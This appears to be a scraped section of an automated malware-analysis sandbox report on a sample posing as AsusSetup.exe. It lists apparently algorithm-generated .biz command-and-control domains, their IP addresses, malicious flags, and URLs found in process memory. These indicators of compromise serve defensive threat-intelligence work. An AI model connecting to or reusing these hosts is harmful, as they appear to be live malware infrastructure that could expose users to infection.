            		truefalse
              		unknown
              ctdtgwag.biz
              		3.94.10.34
              		truefalse
                		unknown
                tbjrpv.biz
                		34.246.200.160
                		truefalse
                  		unknown
                  kcyvxytog.biz
                  		18.208.156.248
                  		truetrue
                    		unknown
                    ereplfx.biz
                    		18.246.231.120
                    		truetrue
                      		unknown
                      apzzls.biz
                      		34.211.97.45
                      		truefalse
                        		unknown
                        sxmiywsfv.biz
                        		13.251.16.150
                        		truefalse
                          		unknown
                          pgfsvwx.biz
                          		18.208.156.248
                          		truetrue
                            		unknown
                            przvgke.biz
                            		172.234.222.138
                            		truefalse
                              		unknown
                              ocsvqjg.biz
                              		3.254.94.185
                              		truefalse
                                		unknown
                                ecxbwt.biz
                                		54.244.188.177
                                		truefalse
                                  		unknown
                                  bghjpy.biz
                                  		34.211.97.45
                                  		truefalse
                                    		unknown
                                    damcprvgv.biz
                                    		18.208.156.248
                                    		truetrue
                                      		unknown
                                      gnqgo.biz
                                      		18.208.156.248
                                      		truetrue
                                        		unknown
                                        tltxn.biz
                                        		18.208.156.248
                                        		truetrue
                                          		unknown
                                          deoci.biz
                                          		18.208.156.248
                                          		truetrue
                                            		unknown
                                            krnsmlmvd.biz
                                            		47.129.31.212
                                            		truefalse
                                              		unknown
                                              uevrpr.biz
                                              		18.246.231.120
                                              		truetrue
                                                		unknown
                                                hagujcj.biz
                                                		18.208.156.248
                                                		truetrue
                                                  		unknown
                                                  bumxkqgxu.biz
                                                  		44.221.84.105
                                                  		truetrue
                                                    		unknown
                                                    yhqqc.biz
                                                    		34.211.97.45
                                                    		truefalse
                                                      		unknown
                                                      ltpqsnu.biz
                                                      		18.208.156.248
                                                      		truetrue
                                                        		unknown
                                                        sctmku.biz
                                                        		35.164.78.200
                                                        		truefalse
                                                          		unknown
                                                          gcedd.biz
                                                          		13.251.16.150
                                                          		truefalse
                                                            		unknown
                                                            wxgzshna.biz
                                                            		72.52.178.23
                                                            		truefalse
                                                              		unknown
                                                              oshhkdluh.biz
                                                              		54.244.188.177
                                                              		truefalse
                                                                		unknown
                                                                opowhhece.biz
                                                                		18.208.156.248
                                                                		truetrue
                                                                  		unknown
                                                                  pectx.biz
                                                                  		18.246.231.120
                                                                  		truetrue
                                                                    		unknown
                                                                    jwkoeoqns.biz
                                                                    		18.208.156.248
                                                                    		truetrue
                                                                      		unknown
                                                                      jpskm.biz
                                                                      		34.211.97.45
                                                                      		truefalse
                                                                        		unknown
                                                                        cjvgcl.biz
                                                                        		18.208.156.248
                                                                        		truetrue
                                                                          		unknown
                                                                          ifsaia.biz
                                                                          		13.251.16.150
                                                                          		truefalse
                                                                            		unknown
                                                                            rynmcq.biz
                                                                            		54.244.188.177
                                                                            		truefalse
                                                                              		unknown
                                                                              fjumtfnz.biz
                                                                              		34.211.97.45
                                                                              		truefalse
                                                                                		unknown
                                                                                dyjdrp.biz
                                                                                		54.244.188.177
                                                                                		truefalse
                                                                                  		unknown
                                                                                  ypituyqsq.biz
                                                                                  		3.94.10.34
                                                                                  		truefalse
                                                                                    		unknown
                                                                                    tnevuluw.biz
                                                                                    		35.164.78.200
                                                                                    		truefalse
                                                                                      		unknown
                                                                                      znwbniskf.biz
                                                                                      		47.129.31.212
                                                                                      		truefalse
                                                                                        		unknown
                                                                                        ijnmvqa.biz
                                                                                        		35.164.78.200
                                                                                        		truefalse
                                                                                          		unknown
                                                                                          saytjshyf.biz
                                                                                          		44.221.84.105
                                                                                          		truetrue
                                                                                            		unknown
                                                                                            rrqafepng.biz
                                                                                            		47.129.31.212
                                                                                            		truefalse
                                                                                              		unknown
                                                                                              aatcwo.biz
                                                                                              		47.129.31.212
                                                                                              		truefalse
                                                                                                		unknown
                                                                                                uphca.biz
                                                                                                		44.221.84.105
                                                                                                		truetrue
                                                                                                  		unknown
                                                                                                  htwqzczce.biz
                                                                                                  		172.234.222.138
                                                                                                  		truefalse
                                                                                                    		unknown
                                                                                                    xyrgy.biz
                                                                                                    		18.208.156.248
                                                                                                    		truetrue
                                                                                                      		unknown
                                                                                                      banwyw.biz
                                                                                                      		44.221.84.105
                                                                                                      		truetrue
                                                                                                        		unknown
                                                                                                        myups.biz
                                                                                                        		165.160.15.20
                                                                                                        		truefalse
                                                                                                          		unknown
                                                                                                          pwlqfu.biz
                                                                                                          		34.246.200.160
                                                                                                          		truefalse
                                                                                                            		unknown
                                                                                                            zyiexezl.biz
                                                                                                            		18.208.156.248
                                                                                                            		truetrue
                                                                                                              		unknown
                                                                                                              hlzfuyy.biz
                                                                                                              		34.211.97.45
                                                                                                              		truefalse
                                                                                                                		unknown
                                                                                                                ssbzmoy.biz
                                                                                                                		18.141.10.107
                                                                                                                		truefalse
                                                                                                                  		unknown
                                                                                                                  knjghuig.biz
                                                                                                                  		18.141.10.107
                                                                                                                  		truefalse
                                                                                                                    		unknown
                                                                                                                    yunalwv.biz
                                                                                                                    		208.100.26.245
                                                                                                                    		truefalse
                                                                                                                      		unknown
                                                                                                                      brsua.biz
                                                                                                                      		3.254.94.185
                                                                                                                      		truefalse
                                                                                                                        		unknown
                                                                                                                        mgmsclkyu.biz
                                                                                                                        		34.246.200.160
                                                                                                                        		truefalse
                                                                                                                          		unknown
                                                                                                                          cpclnad.biz
                                                                                                                          		44.221.84.105
                                                                                                                          		truetrue
                                                                                                                            		unknown
                                                                                                                            ptrim.biz
                                                                                                                            		18.141.10.107
                                                                                                                            		truefalse
                                                                                                                              		unknown
                                                                                                                              ihcnogskt.biz
                                                                                                                              		35.164.78.200
                                                                                                                              		truefalse
                                                                                                                                		unknown
                                                                                                                                qpnczch.biz
                                                                                                                                		18.246.231.120
                                                                                                                                		truetrue
                                                                                                                                  		unknown
                                                                                                                                  mnjmhp.biz
                                                                                                                                  		47.129.31.212
                                                                                                                                  		truefalse
                                                                                                                                    		unknown
                                                                                                                                    acwjcqqv.biz
                                                                                                                                    		18.141.10.107
                                                                                                                                    		truefalse
                                                                                                                                      		unknown
                                                                                                                                      zrlssa.biz
                                                                                                                                      		44.221.84.105
                                                                                                                                      		truetrue
                                                                                                                                        		unknown
                                                                                                                                        pywolwnvd.biz
                                                                                                                                        		54.244.188.177
                                                                                                                                        		truefalse
                                                                                                                                          		unknown
                                                                                                                                          mjheo.biz
                                                                                                                                          		44.221.84.105
                                                                                                                                          		truetrue
                                                                                                                                            		unknown
                                                                                                                                            lrxdmhrr.biz
                                                                                                                                            		54.244.188.177
                                                                                                                                            		truefalse
                                                                                                                                              		unknown
                                                                                                                                              vrrazpdh.biz
                                                                                                                                              		34.211.97.45
                                                                                                                                              		truefalse
                                                                                                                                                		unknown
                                                                                                                                                cikivjto.biz
                                                                                                                                                		18.246.231.120
                                                                                                                                                		truetrue
                                                                                                                                                  		unknown
                                                                                                                                                  fgajqjyhr.biz
                                                                                                                                                  		34.211.97.45
                                                                                                                                                  		truefalse
                                                                                                                                                    		unknown
                                                                                                                                                    hehckyov.biz
                                                                                                                                                    		44.221.84.105
                                                                                                                                                    		truetrue
                                                                                                                                                      		unknown
                                                                                                                                                      kkqypycm.biz
                                                                                                                                                      		18.141.10.107
                                                                                                                                                      		truefalse
                                                                                                                                                        		unknown
                                                                                                                                                        bzkysubds.biz
                                                                                                                                                        		3.94.10.34
                                                                                                                                                        		truefalse
                                                                                                                                                          		unknown
                                                                                                                                                          xlfhhhm.biz
                                                                                                                                                          		47.129.31.212
                                                                                                                                                          		truefalse
                                                                                                                                                            		unknown
                                                                                                                                                            warkcdu.biz
                                                                                                                                                            		18.141.10.107
                                                                                                                                                            		truefalse
                                                                                                                                                              		unknown
                                                                                                                                                              npukfztj.biz
                                                                                                                                                              		44.221.84.105
                                                                                                                                                              		truetrue
                                                                                                                                                                		unknown
                                                                                                                                                                dwrqljrr.biz
                                                                                                                                                                		54.244.188.177
                                                                                                                                                                		truefalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  gytujflc.biz
                                                                                                                                                                  		208.100.26.245
                                                                                                                                                                  		truefalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    gvijgjwkh.biz
                                                                                                                                                                    		3.94.10.34
                                                                                                                                                                    		truefalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      sewlqwcd.biz
                                                                                                                                                                      		44.221.84.105
                                                                                                                                                                      		truetrue
                                                                                                                                                                        		unknown
                                                                                                                                                                        vnvbt.biz
                                                                                                                                                                        		18.246.231.120
                                                                                                                                                                        		truetrue
                                                                                                                                                                          		unknown
                                                                                                                                                                          nwdnxrd.biz
                                                                                                                                                                          		54.244.188.177
                                                                                                                                                                          		truefalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            qvuhsaqa.biz
                                                                                                                                                                            		54.244.188.177
                                                                                                                                                                            		truefalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              iuzpxe.biz
                                                                                                                                                                              		13.251.16.150
                                                                                                                                                                              		truefalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                nqwjmb.biz
                                                                                                                                                                                		35.164.78.200
                                                                                                                                                                                		truefalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  wllvnzb.biz
                                                                                                                                                                                  		18.141.10.107
                                                                                                                                                                                  		truefalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    kvbjaur.biz
                                                                                                                                                                                    		54.244.188.177
                                                                                                                                                                                    		truefalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      napws.biz
                                                                                                                                                                                      		35.164.78.200
                                                                                                                                                                                      		truefalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        cvgrf.biz
                                                                                                                                                                                        		54.244.188.177
                                                                                                                                                                                        		truefalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          lpuegx.biz
                                                                                                                                                                                          		82.112.184.197
                                                                                                                                                                                          		truefalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            vcddkls.biz
                                                                                                                                                                                            		18.141.10.107
                                                                                                                                                                                            		truefalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              wluwplyh.biz
                                                                                                                                                                                              		18.141.10.107
                                                                                                                                                                                              		truefalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                vyome.biz
                                                                                                                                                                                                		18.246.231.120
                                                                                                                                                                                                		truetrue
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  dlynankz.biz
                                                                                                                                                                                                  		85.214.228.140
                                                                                                                                                                                                  		truefalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    reczwga.biz
                                                                                                                                                                                                    		44.221.84.105
                                                                                                                                                                                                    		truetrue
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      xccjj.biz
                                                                                                                                                                                                      		18.246.231.120
                                                                                                                                                                                                      		truetrue
                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                        jifai.biz
                                                                                                                                                                                                        		44.221.84.105
                                                                                                                                                                                                        		truetrue
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          Contacted URLs

                                                                                                                                                                                                          NameMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                          http://sewlqwcd.biz/mltrue
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            http://ssbzmoy.biz/wfalse
                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                              http://xlfhhhm.biz/lenfalse
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://brsua.biz/mfalse
                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                  http://nwdnxrd.biz/exbxilbdfwjafalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://krnsmlmvd.biz/icdmsrmdsfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://yunalwv.biz/arqypullvoovtlfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        http://tbjrpv.biz/qearwetpmwvhvwhifalse
                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                          http://ltpqsnu.biz/qscftkkkcjjortrue
                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                            http://mgmsclkyu.biz/isekcffalse
                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                              http://rrqafepng.biz/taltetnlfalse
                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                http://lpuegx.biz/ctmnxqregqafwfalse
                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                  http://ctdtgwag.biz/sfalse
                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                    http://nqwjmb.biz/oekfiujfalse
                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                      http://myups.biz/inljitifalse
                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                        http://ihcnogskt.biz/wawftafalse
                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                          http://tnevuluw.biz/yasnhmosjfaqmfalse
                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                            http://pywolwnvd.biz/rtjiyksbemvookfalse
                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                              http://myups.biz/afgollfalse
                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                http://cvgrf.biz/oiolfalse
                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                  http://ocsvqjg.biz/jwfalse
                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                    http://ypituyqsq.biz/grbkwbsaefalse
                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                      http://gjogvvpsf.biz/cftycvbqsjsfcfalse
                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                        http://ereplfx.biz/htaetrue
                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                          http://qncdaagct.biz/iljbyhyeqafalse
                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                            http://dwrqljrr.biz/swlfalse
                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                              http://cikivjto.biz/ngujcsutrue
                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                http://ijnmvqa.biz/vlwdbxkbnakykkgrfalse
                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                  http://vjaxhpbji.biz/bdrtsxyfalse
                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                    http://ftxlah.biz/xmqlmgbfalse
                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                      http://yunalwv.biz/dovasmbpdbfalse
                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                        http://jpskm.biz/qtybvvfgdyqyfalse
                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                          http://pgfsvwx.biz/vtxunogtrue
                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                            http://sxmiywsfv.biz/ohpfalse
                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                              http://fwiwk.biz/ckdrshkofalse
                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                http://damcprvgv.biz/dnmujjtrue
                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                  http://jdhhbs.biz/assjekulsfalse
                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                    http://cjvgcl.biz/cbrxaagotrue
                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                      http://esuzf.biz/rwiegxfalse
                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                        http://mnjmhp.biz/pcwhdleqsuufalse
                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                          http://dyjdrp.biz/mxtehtsjbwfalse
                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                            http://qcrsp.biz/wbxnurofalse
                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                              http://lpuegx.biz/dnirvyhujqwqncfalse
                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                http://uevrpr.biz/xtrue
                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                  http://xnxvnn.biz/skriadsmnmfalse
                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                    http://xccjj.biz/aixrttrue
                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                      http://zrlssa.biz/mcduyucxmuwkatrue
                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                        http://ecxbwt.biz/asvifalse
                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                          http://banwyw.biz/ydbxvrfdujattrue
                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                            http://przvgke.biz/agsaomftijmfalse
                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                              http://rffxu.biz/luseocfalse
                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                http://napws.biz/mcjaqbnefalse
                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                  http://qpnczch.biz/oomorpsdyukhtrue
                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                    http://nlscndwp.biz/nfalse
                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                      http://qaynky.biz/vvofalse
                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                        http://cvgrf.biz/nxfilvvdujkpfalse
                                                                                                                                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                                                                                                                                          URLs from Memory and Binaries

                                                                                                                                                                                                                                                                                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                                                                                                                                                                                          http://18.141.10.107/ngsalg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                            http://13.251.16.150:80/ubaevhdsrbjcmaqlsalg.exe, 00000003.00000003.2628578361.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2637723512.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                              http://44.221.84.105/wurutvkartalg.exe, 00000003.00000003.2224451831.000000000059B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2216657614.000000000059A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                http://13.251.16.150:80/vvoalg.exe, 00000003.00000003.2725026412.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2734599445.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                                  http://18.246.231.120/alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                                    https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newsetup.exe1.3.drfalse
                                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                                      http://208.100.26.245/pubppqcmfqvtodalg.exe, 00000003.00000003.2703850793.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2724178578.00000000005EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                                        http://18.208.156.248:80/palg.exe, 00000003.00000003.2693383096.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                                                          http://18.141.10.107/ewfalg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                                            http://44.221.84.105/AsusSetup.exe, 00000000.00000003.2202574488.0000000000508000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2734599445.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745895344.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2755453879.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                                              http://82.112.184.197/tkrvouqomflftlqpalg.exe, 00000003.00000003.2590844447.0000000000577000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                                https://crashpad.chromium.org/setup.exe1.3.drfalse
                                                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                                                  http://54.244.188.177/swlalg.exe, 00000003.00000003.2745895344.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                                                    https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881118.0.1alg.exe, 00000003.00000003.2757457724.0000000000400000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                                                      http://172.234.222.138:80/ckdrshkoalg.exe, 00000003.00000003.2671636939.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                                                        http://18.246.231.120/vdqmhlkrsphqhealg.exe, 00000003.00000003.2894777095.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                                                                          http://47.129.31.212/lenalg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                                                            http://18.141.10.107:80/ewfalg.exe, 00000003.00000003.2882783390.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                                                              http://34.246.200.160:80/qearwetpmwvhvwhialg.exe, 00000003.00000003.2683846196.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                                                http://18.141.10.107:80/suoyjqbsciv-alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                                                                  http://13.251.16.150/ubadvhdsrbjcmaqlalg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                                                                    http://54.244.188.177/juldvutdralg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179863337.0000000000599000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179107038.000000000059C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/vicdeigingsAsusSetup.exe, 00000000.00000003.2203124475.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2476390228.0000000004D8E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                                                                        http://44.221.84.105:80/tj7fZalg.exe, 00000003.00000003.2864295525.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                                                                                          http://82.112.184.197/alg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2590844447.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                                                                            http://18.208.156.248/lrealg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                                                                              https://crashpad.chromium.org/bug/newsetup.exe1.3.drfalse
                                                                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                                                                http://208.100.26.245/pubppqcmfqvtoalg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2792457959.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                                                                                  http://44.221.84.105/bsalg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                                                                                    http://208.100.26.245:80/hrtvnxyfpkjy5alg.exe, 00000003.00000003.2704536498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                                                                                      http://44.221.84.105/ngsAsusSetup.exe, 00000000.00000003.2202574488.0000000000518000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.0000000000518000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                                                                                                                                                                                        http://18.208.156.248/gsalg.exe, 00000003.00000003.2903488909.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                                                                                                                                                                                                          http://18.141.10.107/ewfngsialg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                                                                                                                                                                                                            http://18.208.156.248:80/yqjotihouwfthlkralg.exe, 00000003.00000003.2903488909.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                              		unknown
                                                                                                                                                                                                                                                                                                                                                                                              http://172.234.222.138/sdalg.exe, 00000003.00000003.2671636939.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                                                                                                                                                                                                http://18.208.156.248/tlrealg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2850603674.0000000000596000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                                                                                                                                                                                                                  http://208.100.26.245/(alg.exe, 00000003.00000003.2704536498.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                                                                                                                                                                                                    http://54.244.188.177/alg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                                                                                                                                                                                                      http://54.244.188.177:80/swlsalg.exe, 00000003.00000003.2755453879.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745895344.00000000005B9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                                                                                                                                                                        		unknown
